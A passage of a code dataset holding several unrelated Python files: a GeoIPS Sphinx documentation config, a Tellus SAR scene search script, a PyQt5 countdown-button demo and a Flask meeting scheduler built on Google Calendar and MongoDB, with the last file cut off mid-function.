The full version, including alpha/beta/rc tags.\nrelease = \"{0}\".format(VERSION)\n# The short X.Y version.\nversion = \"{0}\".format(VERSION[0:3])\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#\n# This is also used if you do content translation via gettext catalogs.\n# Usually you set \"language\" from the command line for these cases.\nlanguage = \"en\"\n\n# There are two options for replacing |today|: either, you set today to some\n# non-false value, then it is used:\n# today = ''\n# Else, today_fmt is used as the format for a strftime call.\n# today_fmt = '%B %d, %Y'\n\nexclude_patterns = [\n    \"**.ipynb_checkpoints\",\n    # to ensure that include files (partial pages) aren't built, exclude them\n    # https://github.com/sphinx-doc/sphinx/issues/1965#issuecomment-124732907\n    \"**/includes/**\",\n]\n\n# The reST default role (used for this markup: `text`) to use for all\n# documents.\n# default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n# add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. 
function::).\n# add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n# show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = \"sphinx\"\n\n# A list of ignored prefixes for module index sorting.\n# modindex_common_prefix = []\n\n# If true, keep warnings as \"system message\" paragraphs in the built documents.\n# keep_warnings = False\n\n# If true, `todo` and `todoList` produce output, else they produce nothing.\ntodo_include_todos = False\n\n\n# -- Options for HTML output ----------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = \"pydata_sphinx_theme\"\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\nhtml_theme_options = {\n \"external_links\": [],\n \"footer_end\": [\"geoips_footer\"],\n \"github_url\": \"https://github.com/NRLMMD-GEOIPS/PKGNAME\",\n \"navbar_end\": [\"theme-switcher\", \"navbar-icon-links\"],\n \"logo\": {\n \"image_light\": \"_static/NRL_logo_RGB.jpg\",\n \"image_dark\": \"_static/NRL_logo_sidebar_Reverse.png\",\n },\n}\n\n# Add any paths that contain custom themes here, relative to this directory.\n# html_theme_path = []\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n# html_title = None\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n# html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\nhtml_logo = \"_static/NRL_logo_sidebar_Reverse.png\"\n\n# The name of an image file (relative to this directory) to use as a favicon of\n# the docs. This file should be a Windows icon file (.ico) being 16x16 or\n# 32x32 pixels large.\nhtml_favicon = \"_static/nrlicon.ico\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n\n# Add any extra paths that contain custom files (such as robots.txt or\n# .htaccess) here, relative to this directory. These files are copied\n# directly to the root of the documentation.\n# html_extra_path = []\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\n# html_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n# html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n# html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n# html_additional_pages = {}\n\n# If false, no module index is generated.\n# html_domain_indices = True\n\n# If false, no index is generated.\n# html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n# html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n# html_show_sourcelink = True\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\nhtml_show_sphinx = False\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. 
Default is True.\n# US Navy does not copyright\nhtml_show_copyright = False\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n# html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n# html_file_suffix = None\n\n# Language to be used for generating the HTML full-text search index.\n# Sphinx supports the following languages:\n# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'\n# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'\nhtml_search_language = \"en\"\n\n# A dictionary with options for the search language support, empty by default.\n# Now only 'ja' uses this config value\n# html_search_options = {'type': 'default'}\n\n# The name of a javascript file (relative to the configuration directory) that\n# implements a search results scorer. If empty, the default will be used.\n# html_search_scorer = 'scorer.js'\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = \"GeoIPS_PKGNAME_doc\"\n\n# -- Options for LaTeX output ---------------------------------------------\n\n# Latex additional files to include to format header footer for PDF.\nlatex_additional_files = [\"fancyhf.sty\"]\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n # 'papersize': 'letterpaper',\n # The font size ('10pt', '11pt' or '12pt').\n \"pointsize\": \"12pt\",\n # Additional stuff for the LaTeX preamble.\n # 'preamble': '',\n \"preamble\": r\"\\usepackage{fancyhf}\",\n # Latex figure (float) alignment\n \"figure_align\": \"H\",\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\npkgnamelatex = \"PKGNAME\".split(\"_\")\nif len(pkgnamelatex) > 1:\n # set up latex escape\n pkgnamelatex = r\"\\_\".join(pkgnamelatex)\nlatex_documents = [\n (\n master_doc,\n \"GeoIPS_PKGNAME.tex\",\n \"GeoIPS {0} Documentation\".format(pkgnamelatex),\n \"U.S. NAVAL RESEARCH LABORATORY\",\n \"manual\",\n False,\n ),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\nlatex_logo = \"_static/NRL_logo_RGB.jpg\"\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n# latex_use_parts = False\n\n# If true, show page references after internal links.\n# latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n# latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n# latex_appendices = []\n\n# If false, no module index is generated.\nlatex_domain_indices = True\n\n\n# -- Options for manual page output ---------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n (master_doc, \"GeoIPS_PKGNAME\", \"GeoIPS PKGNAME Documentation\", [author], 1)\n]\n\n# If true, show URL addresses after external links.\n# man_show_urls = False\n\n\n# -- Options for Texinfo output -------------------------------------------\n\n# Grouping the document tree into Texinfo files. 
List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n (\n master_doc,\n \"GeoIPS_PKGNAME\",\n \"GeoIPS PKGNAME Documentation\",\n author,\n \"NRL-MMD\",\n \"Geolocated Information Processing System.\",\n \"packages: interface, modules, tools\",\n ),\n]\n\n# Documents to append as an appendix to all manuals.\n# texinfo_appendices = []\n\n# If false, no module index is generated.\ntexinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n# texinfo_show_urls = 'footnote'\n\n# If true, do not generate a @detailmenu in the \"Top\" node's menu.\n# texinfo_no_detailmenu = False\n\n\n# setup and rstjinja based on pandas-doc rendering\ndef rstjinja(app, docname, source):\n \"\"\"Render our pages as a jinja template for fancy templating goodness.\"\"\"\n # https://www.ericholscher.com/blog/2016/jul/25/integrating-jinja-rst-sphinx/\n # Make sure we're outputting HTML\n if app.builder.format != \"html\":\n return\n src = source[0]\n rendered = app.builder.templates.render_string(src, app.config.html_context)\n source[0] = rendered\n\n\n# need min:max width limits ref https://stackoverflow.com/a/43186995/1480918\ndef setup(app):\n \"\"\"Css width setup.\"\"\"\n app.add_css_file(\"set_width.css\")\n \"\"\"Jinja setup function.\"\"\"\n app.connect(\"source-read\", rstjinja)\n", "repo_name": "NRLMMD-GEOIPS/geoips", "sub_path": "docs/source/_templates/conf_PKG.py", "file_name": "conf_PKG.py", "file_ext": "py", "file_size_in_byte": 11980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "52", "api": [{"api_name": "geoips.__version__", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sys.path.extend", "line_number": 28, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "jinja2.Template", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "2337498311", "text": "import requests, json\nimport argparse\n\ndef parse_args():\n \"\"\"Parse command line arguments.\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"TOKEN\", type=str, help=\"your Tellus API TOKEN\")\n parser.add_argument(\"-p\", \"--Palsar_Type\", type=str, default=\"L2.1\", help=\"Specify L2.1 or L1.1\")\n parser.add_argument(\"-s\", \"--start_datetime\", type=str, default=\"2017-04-21\", help=\"search start datetime\")\n parser.add_argument(\"-e\", \"--end_datetime\", type=str, 
default=\"2021-12-30\", help=\"search end datetime\")\n parser.add_argument(\"-lat\", \"--lat\", type=float, default=139.692101, help=\"search center latitude\")\n parser.add_argument(\"-lon\", \"--lon\", type=float, default=35.689634, help=\"search center longitude\") \n args = parser.parse_args()\n\n return args\n\n\ndef make_config(args):\n config = {}\n config['TOKEN'] = args.TOKEN\n\n if args.Palsar_Type == \"L2.1\":\n # Palsar-2, L2.1\n config['datasetId'] = 'b0e16dea-6544-4422-926f-ad3ec9a3fcbd'\n elif args.Palsar_Type == \"L1.1\":\n # Palsar-2, L1.1\n config['datasetId'] = '1a41a4b1-4594-431f-95fb-82f9bdc35d6b'\n else:\n # Palsar-2, L2.1\n config['datasetId'] = 'b0e16dea-6544-4422-926f-ad3ec9a3fcbd'\n print(\"Specify L2.1 or L1.1, for now using L2.1\")\n \n config['query']={\n 'start_datetime': {'gte': args.start_datetime},\n 'end_datetime': {'lte': args.end_datetime}\n }\n config['sortby'] = [\n {'field': 'properties.end_datetime', 'direction':'desc'}\n ]\n \n config['intersects'] = make_inter(args.lat, args.lon)\n config['lat'] = args.lat\n config['lon'] = args.lon\n\n return config\n\n\ndef make_inter(lat, lon):\n lat_plus = lat + 0.01\n lon_plus = lon + 0.01\n\n intersects = {\n 'type': 'Polygon', 'coordinates': [\n [\n [lat, lon],\n [lat_plus, lon],\n [lat_plus, lon_plus],\n [lat, lon_plus],\n [lat, lon]\n ]\n ]\n }\n return intersects\n\n\ndef search_palsar2_l11(config, paginate=None, next_url=''):\n if len(next_url) > 0:\n url = next_url\n else:\n url = 'https://www.tellusxdp.com/api/traveler/v1/datasets/{}/data-search/'.format(config['dataset_id'])\n headers = {\n \"Authorization\": \"Bearer \" + config['TOKEN'],\n 'Content-Type': 'application/json'\n }\n\n payloads = {}\n if config['intersects'] is not None:\n payloads['intersects'] = config['intersects']\n if config['query'] is not None:\n payloads['query'] = config['query']\n if isinstance(config['sortby'], list):\n payloads['sortby'] = config['sortby']\n if paginate is not None:\n payloads['paginate'] = paginate\n r = requests.post(url, headers=headers, data=json.dumps(payloads))\n\n if not r.status_code == requests.codes.ok:\n r.raise_for_status()\n return r.json()\n\n\ndef main():\n args = parse_args()\n config = make_config(args)\n lat = config['lat']\n lon = config['lon']\n \n ret = search_palsar2_l11(config)\n\n for i in ret['features']:\n geo = i['geometry']['coordinates']\n pro = i['properties']\n lon_min = min([geo[0][i][0] for i in range(4)])\n lat_min = min([geo[0][i][1] for i in range(4)])\n lon_max = max([geo[0][i][0] for i in range(4)])\n lat_max = max([geo[0][i][1] for i in range(4)])\n if lat > lat_min and lat < lat_max and lon > lon_min and lon < lon_max:\n print(i['id'], pro['palsar2:beam'], pro['sat:relative_orbit'], pro['tellus:sat_frame'], pro['start_datetime'])\n \n\nif __name__ == \"__main__\":\n main()", "repo_name": "yosuke-civil-tokyo/SAR_disaster_Tellus", "sub_path": "search_sar.py", "file_name": "search_sar.py", "file_ext": "py", "file_size_in_byte": 3658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 88, "usage_type": "attribute"}]} +{"seq_id": "24157113200", "text": "import sys\nfrom PyQt5.QtWidgets import QToolButton, QWidget, QPushButton, QApplication, 
QMainWindow, QAction, qApp, QMenu\n\nfrom PyQt5.QtCore import QTimer, QUrl\nfrom PyQt5.QtCore import Qt\n\nclass Example(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.initUI()\n\n    def initUI(self):\n\n        bt1 = QPushButton(\"What is this\",self)\n\n        self.bt2 = QPushButton('Send verification code',self)\n\n        menu = QMenu(self)\n        menu.addAction('I am')\n        menu.addSeparator()\n        menu.addAction('in the world')\n        menu.addSeparator()\n        menu.addAction('the most handsome')\n\n        bt1.setMenu(menu)\n\n        self.count = 10\n\n        self.bt2.clicked.connect(self.Action)\n\n        self.time = QTimer(self)\n        self.time.setInterval(1000)\n        self.time.timeout.connect(self.Refresh)\n\n        self.show()\n\n    def Action(self):\n        if self.bt2.isEnabled():\n            self.time.start()\n            self.bt2.setEnabled(False)\n    \n    def Refresh(self):\n        if self.count > 0:\n            self.bt2.setText(str(self.count)+'s until resend')\n            self.count -= 1\n        else:\n            self.time.stop()\n            self.bt2.setEnabled(True)\n            self.bt2.setText('Send verification code')\n            self.count = 10\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    ex = Example()\n    sys.exit(app.exec_())", "repo_name": "Falcon-Peregrine/PyQt5", "sub_path": "知乎Win7端/10_QPushButton(QPushButton, QTimer).py", "file_name": "10_QPushButton(QPushButton, QTimer).py", "file_ext": "py", "file_size_in_byte": 1289, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 7, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMenu", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "13828847353", "text": "import flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nimport uuid\n\nimport json\nimport logging\n\n# Date handling\nimport arrow # Replacement for datetime, based on moment.js\nimport datetime # But we still need time\nfrom dateutil import tz # For interpreting local times\n\n\n# OAuth2 - Google library implementation for convenience\nfrom oauth2client import client\nimport httplib2 # used in oauth2 flow\n\n# Google API for services\nfrom apiclient import discovery\n\n# Mongo database\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\n\n# random int for key\nfrom random import randint\n\n###\n# Globals\n###\nimport CONFIG\napp = flask.Flask(__name__)\n\n\ntry:\n    dbclient = MongoClient(CONFIG.MONGO_URL)\n    db = dbclient.MeetMe\n    collection = db.dated\n\nexcept:\n    print(\"Failure opening database. Is Mongo running?
Correct password?\")\n    raise SystemExit(1)\n\nSCOPES = 'https://www.googleapis.com/auth/calendar.readonly'\nCLIENT_SECRET_FILE = CONFIG.GOOGLE_LICENSE_KEY ## You'll need this\nAPPLICATION_NAME = 'MeetMe'\n\n\n#############################\n#\n#  Pages (routed from URLs)\n#\n#############################\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n    app.logger.debug(\"Entering index\")\n    if 'begin_date' not in flask.session:\n        init_session_values()\n    if 'calendars' in flask.session:\n        flask.session.pop('calendars', None)\n    return render_template('index.html')\n\n@app.route(\"/choose\")\ndef choose():\n    ## We'll need authorization to list calendars\n    ## I wanted to put what follows into a function, but had\n    ## to pull it back here because the redirect has to be a\n    ## 'return'\n    app.logger.debug(\"Checking credentials for Google calendar access\")\n    credentials = valid_credentials()\n    if not credentials:\n        app.logger.debug(\"Redirecting to authorization\")\n        return flask.redirect(flask.url_for('oauth2callback'))\n    global gcal_service #used in busyTimes\n    gcal_service = get_gcal_service(credentials)\n    app.logger.debug(\"Returned from get_gcal_service\")\n    flask.session['calendars'] = list_calendars(gcal_service)\n    return render_template('index.html')\n\n####\n#\n#  Google calendar authorization:\n#      Returns us to the main /choose screen after inserting\n#      the calendar_service object in the session state.  May\n#      redirect to OAuth server first, and may take multiple\n#      trips through the oauth2 callback function.\n#\n#  Protocol for use ON EACH REQUEST:\n#     First, check for valid credentials\n#     If we don't have valid credentials\n#         Get credentials (jump to the oauth2 protocol)\n#         (redirects back to /choose, this time with credentials)\n#     If we do have valid credentials\n#         Get the service object\n#\n#  The final result of successful authorization is a 'service'\n#  object.  We use a 'service' object to actually retrieve data\n#  from the Google services.  Service objects are NOT serializable ---\n#  we can't stash one in a cookie.  Instead, on each request we\n#  get a fresh service object from our credentials, which are\n#  serializable.\n#\n#  Note that after authorization we always redirect to /choose;\n#  If this is unsatisfactory, we'll need a session variable to use\n#  as a 'continuation' or 'return address' to use instead.\n#\n####\n\ndef valid_credentials():\n    \"\"\"\n    Returns OAuth2 credentials if we have valid\n    credentials in the session.  This is a 'truthy' value.\n    Return None if we don't have credentials, or if they\n    have expired or are otherwise invalid.  This is a 'falsy' value.\n    \"\"\"\n    if 'credentials' not in flask.session:\n        return None\n\n    credentials = client.OAuth2Credentials.from_json(\n        flask.session['credentials'])\n\n    if (credentials.invalid or\n            credentials.access_token_expired):\n        return None\n    return credentials\n\n\ndef get_gcal_service(credentials):\n    \"\"\"\n    We need a Google calendar 'service' object to obtain\n    list of calendars, busy times, etc.  This requires\n    authorization. If authorization is already in effect,\n    we'll just return with the authorization. 
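\n\n    A sketch of the calling pattern (illustrative; it mirrors what choose()\n    above already does, not additional behavior):\n\n        credentials = valid_credentials()\n        if not credentials:\n            return flask.redirect(flask.url_for('oauth2callback'))\n        gcal_service = get_gcal_service(credentials)\n\n    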
Otherwise,\n control flow will be interrupted by authorization, and we'll\n end up redirected back to /choose *without a service object*.\n Then the second call will succeed without additional authorization.\n \"\"\"\n app.logger.debug(\"Entering get_gcal_service\")\n http_auth = credentials.authorize(httplib2.Http())\n service = discovery.build('calendar', 'v3', http=http_auth)\n app.logger.debug(\"Returning service\")\n return service\n\n@app.route('/oauth2callback')\ndef oauth2callback():\n \"\"\"\n The 'flow' has this one place to call back to. We'll enter here\n more than once as steps in the flow are completed, and need to keep\n track of how far we've gotten. The first time we'll do the first\n step, the second time we'll skip the first step and do the second,\n and so on.\n \"\"\"\n app.logger.debug(\"Entering oauth2callback\")\n flow = client.flow_from_clientsecrets(\n CLIENT_SECRET_FILE,\n scope= SCOPES,\n redirect_uri=flask.url_for('oauth2callback', _external=True))\n ## Note we are *not* redirecting above. We are noting *where*\n ## we will redirect to, which is this function.\n\n ## The *second* time we enter here, it's a callback\n ## with 'code' set in the URL parameter. If we don't\n ## see that, it must be the first time through, so we\n ## need to do step 1.\n app.logger.debug(\"Got flow\")\n if 'code' not in flask.request.args:\n app.logger.debug(\"Code not in flask.request.args\")\n auth_uri = flow.step1_get_authorize_url()\n return flask.redirect(auth_uri)\n ## This will redirect back here, but the second time through\n ## we'll have the 'code' parameter set\n else:\n ## It's the second time through ... we can tell because\n ## we got the 'code' argument in the URL.\n app.logger.debug(\"Code was in flask.request.args\")\n auth_code = flask.request.args.get('code')\n credentials = flow.step2_exchange(auth_code)\n flask.session['credentials'] = credentials.to_json()\n ## Now I can build the service and execute the query,\n ## but for the moment I'll just log it and go back to\n ## the main screen\n app.logger.debug(\"Got credentials\")\n return flask.redirect(flask.url_for('choose'))\n\n#####\n#\n# Option setting: Buttons or forms that add some\n# information into session state. 
Don't do the\n#  computation here; use of the information might\n#  depend on what other information we have.\n#    Setting an option sends us back to the main display\n#    page, where we may put the new information to use.\n#\n#####\n\n#Add new members to the meet me app\n#Seems to need to be opened in a different browser\n@app.route('/addMembers')\ndef addMember():\n    key = request.args.get('key')\n    flask.session['finalMeetingID'] = key\n    return flask.redirect(flask.url_for(\"index\"))\n\n\n@app.route('/finalizeMeeting', methods=['POST'])\ndef finalizeMeeting():\n    key = request.form.get('finalMeetingID')\n\n    #checks to see if key can be turned into int\n    try:\n        int(key)\n    except:\n        flask.flash(\"Invalid Key\")\n        return flask.redirect(flask.url_for(\"index\"))\n\n    #if key is a number check valid number\n    if (99999 < int(key) < 1000000):\n        pass  # valid key\n    else:\n        flask.flash(\"Invalid Key\")\n        return flask.redirect(flask.url_for(\"index\"))\n\n    #checks to see if id is even in database\n    try:\n        validate_key_count = 0\n        for record in collection.find({\"type\":\"date_range\"}):\n            if (record[\"id\"] == key):\n                validate_key_count+=1\n            else:\n                pass  # not a match\n        if validate_key_count == 0:\n            flask.flash(\"No matching keys in database\")\n            return flask.redirect(flask.url_for(\"index\"))\n        else:\n            pass  # there are matches in the collection\n    except:\n        flask.flash(\"No matching keys in database\")\n        return flask.redirect(flask.url_for(\"index\"))\n\n    start_end_tuple = mergeDateRanges(key)\n\n    if (start_end_tuple == -1):\n        flask.flash(\"No overlapping dates in date ranges between users\")\n        collection.remove({ 'id':key })\n        return flask.redirect(flask.url_for(\"index\"))\n\n    start_date = start_end_tuple['start_date']\n    end_date = start_end_tuple['end_date']\n\n    all_events_list = getEvents(key)\n\n    flask.session['final_proposal'] = 'true'\n\n    free_times = freeTimes(all_events_list, start_date, end_date)\n    displayFreeTimes(free_times)\n\n    return flask.redirect(flask.url_for(\"index\"))\n\n@app.route('/deleteproposal', methods=['POST'])\ndef deleteproposal():\n    #clears database of that proposal\n    flask.session.pop('final_proposal', None)\n    collection.remove({ 'id':flask.session['meetingID'] })\n    return flask.redirect(flask.url_for(\"index\"))\n\n@app.route('/goback', methods=['POST'])\ndef goback():\n    #goes back without clearing that database\n    flask.session.pop('final_proposal', None)\n    return flask.redirect(flask.url_for(\"index\"))\n\n@app.route('/setrange', methods=['POST'])\ndef setrange():\n\n    \"\"\"\n    User chose a date range with the bootstrap daterange\n    widget.\n    \"\"\"\n\n\n    app.logger.debug(\"Entering setrange\")\n    flask.flash(\"Setrange gave us '{}'\"\n                .format(request.form.get('daterange')))\n    daterange = request.form.get('daterange')\n    flask.session['daterange'] = daterange\n    daterange_parts = daterange.split()\n    flask.session['begin_date'] = interpret_date(daterange_parts[0])\n    flask.session['end_date'] = interpret_date(daterange_parts[2])\n    key = str(randint(100000,999999))\n    flask.session['meetingID'] = key\n    try:\n        key = flask.session['finalMeetingID']\n        flask.session['meetingID'] = key\n    except:\n        pass  # no final meeting id yet\n    record = {\"type\": \"date_range\",\n              \"id\": key,\n              \"start_date\": flask.session['begin_date'],\n              \"end_date\": flask.session['end_date']\n              }\n    collection.insert(record)\n    app.logger.debug(\"Setrange parsed {} - {} dates as {} - {}\".format(\n        daterange_parts[0], daterange_parts[2],\n        flask.session['begin_date'], flask.session['end_date']))\n    return 
flask.redirect(flask.url_for(\"choose\"))\n\n@app.route('/select_calendars', methods=['POST'])\ndef getCalendars():\n app.logger.debug(\"Get selected caldendars\")\n selected_calendars = request.form.getlist('calendar')\n meetingID = str(flask.session['meetingID'])\n try:\n flask.session['finalMeetingID']\n flask.flash(\"Thanks for submitting. Please wait for proposer to get back to you!\")\n except:\n flask.flash(\"This is the key to finalize below.\")\n flask.flash(meetingID)\n flask.flash(\"Below is the url to provide to other meeting participants.\")\n message = \"ix.cs.uoregon.edu:6996/addMembers?key=\" + meetingID\n flask.flash(message)\n\n full_calendars = []\n for cal in flask.session['calendars']:\n if cal['id'] in selected_calendars:\n full_calendars.append(cal)\n cal_event_list = calEventList(full_calendars)\n #put event times into one list\n for cal in cal_event_list:\n if cal: #In case list is empty\n for event in cal:\n #to local time below\n ev_start = arrow.get(event['start']).to('local')\n ev_end = arrow.get(event['end']).to('local')\n record = { \"type\":\"busy_times\",\n \"start\": ev_start.isoformat(),\n \"end\": ev_end.isoformat(),\n \"id\": flask.session['meetingID']\n }\n collection.insert(record)\n\n return flask.redirect(flask.url_for(\"index\"))\n\n####\n#\n# Initialize session variables\n#\n####\n\ndef init_session_values():\n \"\"\"\n Start with some reasonable defaults for date and time ranges.\n Note this must be run in app context ... can't call from main.\n \"\"\"\n # Default date span = tomorrow to 1 week from now\n now = arrow.now('local')\n tomorrow = now.replace(days=+1)\n nextweek = now.replace(days=+7)\n flask.session[\"begin_date\"] = tomorrow.floor('day').isoformat()\n flask.session[\"end_date\"] = nextweek.ceil('day').isoformat()\n flask.session[\"daterange\"] = \"{} - {}\".format(\n tomorrow.format(\"MM/DD/YYYY\"),\n nextweek.format(\"MM/DD/YYYY\"))\n # Default time span each day, 9 to 5\n flask.session[\"begin_time\"] = interpret_time(\"9am\")\n flask.session[\"end_time\"] = interpret_time(\"5pm\")\n\ndef interpret_time( text ):\n \"\"\"\n Read time in a human-compatible format and\n interpret as ISO format with local timezone.\n May throw exception if time can't be interpreted. 
In that\n    case it will also flash a message explaining accepted formats.\n    \"\"\"\n    app.logger.debug(\"Decoding time '{}'\".format(text))\n    time_formats = [\"ha\", \"h:mma\", \"h:mm a\", \"H:mm\"]\n    try:\n        as_arrow = arrow.get(text, time_formats).replace(tzinfo=tz.tzlocal())\n        app.logger.debug(\"Succeeded interpreting time\")\n    except:\n        app.logger.debug(\"Failed to interpret time\")\n        flask.flash(\"Time '{}' didn't match accepted formats 13:30 or 1:30pm\"\n              .format(text))\n        raise\n    return as_arrow.isoformat()\n\ndef interpret_date( text ):\n    \"\"\"\n    Convert text of date to ISO format used internally,\n    with the local time zone.\n    \"\"\"\n    try:\n      as_arrow = arrow.get(text, \"MM/DD/YYYY\").replace(\n          tzinfo=tz.tzlocal())\n    except:\n        flask.flash(\"Date '{}' didn't fit expected format 12/31/2001\")\n        raise\n    return as_arrow.isoformat()\n\ndef next_day(isotext):\n    \"\"\"\n    ISO date + 1 day (used in query to Google calendar)\n    \"\"\"\n    as_arrow = arrow.get(isotext)\n    return as_arrow.replace(days=+1).isoformat()\n\n####\n#\n#  Functions (NOT pages) that return some information\n#\n####\n\ndef getEvents(key):\n    list = []\n    for record in collection.find({\"type\": \"busy_times\"}):\n        if (record['id'] == key):\n            start = record['start']\n            end = record['end']\n            start = arrow.get(start)\n            end = arrow.get(end)\n            pair = {'start': start, 'end': end}\n            list.append(pair)\n    return list\n\ndef mergeDateRanges(key):\n    starts = []\n    ends = []\n    for record in collection.find({\"type\":\"date_range\"}):\n        if (record[\"id\"] == key):\n            start = record[\"start_date\"]\n            end = record[\"end_date\"]\n            starts.append(start)\n            ends.append(end)\n    starts.sort()\n    ends.sort()\n    start = starts[-1]\n    end = ends[0]\n    end = arrow.get(end).isoformat()\n    if start <= end:\n        return {'start_date': start, 'end_date': end}\n    else:\n        return -1\n\ndef freeTimes(all_events_list, start_date, end_date):\n\n    #add nights as events\n    all_events_list = addNights(all_events_list, start_date, end_date)\n    sorted_events = sortEvents(all_events_list) #sort events\n    free_times = getFreeTimes(sorted_events) #gets list of free times\n    return free_times\n\n\ndef displayFreeTimes(free_times):\n    #into a readable format for flask.flash\n    for times in free_times:\n        message = []\n        message.append(readableDate(times[0]))\n        message.append(\" to \")\n        message.append(readableDate(times[1]))\n        message = ''.join(message)\n        flask.flash(message)\n\n\ndef readableDate(date): #formats from arrow object to readable date\n    return date.format('HH:mm MM/DD/YY')\n\ndef getFreeTimes(sorted_list):\n\n    #gets rid of overlapping events\n    improved_sorted_list = eliminateDuplicates(sorted_list)\n\n    free_times = []\n#Adds times from end of events to beginning of next events to free times list\n    for i in range(len(improved_sorted_list)-1):\n        event = improved_sorted_list[i]\n        next_event = improved_sorted_list[i+1]\n        if (event['end'] < next_event['start']):\n            #put in an ordered list to ensure the same order\n            free_times.append([event['end'], next_event['start']])\n    return free_times\n\n\n#gets rid of duplicate busy times\ndef eliminateDuplicates(list):\n    new_list = []\n    list_size = len(list)\n    for i in range(list_size-1):\n        event = list[i]\n        next_event = list[i+1]\n#If the next event's start time is before the previous event's end time, the\n#previous event's end time becomes the next event's start time (partial overlap)\n        # a fully contained next event instead inherits this event's end time\n        if (event['end'] > next_event['start'] and event['end'] > next_event['end']):\n            new_list.append({'start':event['start'], 'end':event['end']})\n
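            # illustrative walkthrough: if this event runs 13:00-17:00 and the\n            # next runs 14:00-15:00, the next is fully contained, so 13:00-17:00\n            # is kept and the next event's end is stretched to 17:00 below,\n            # keeping the later boundary in play for the next comparison\n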
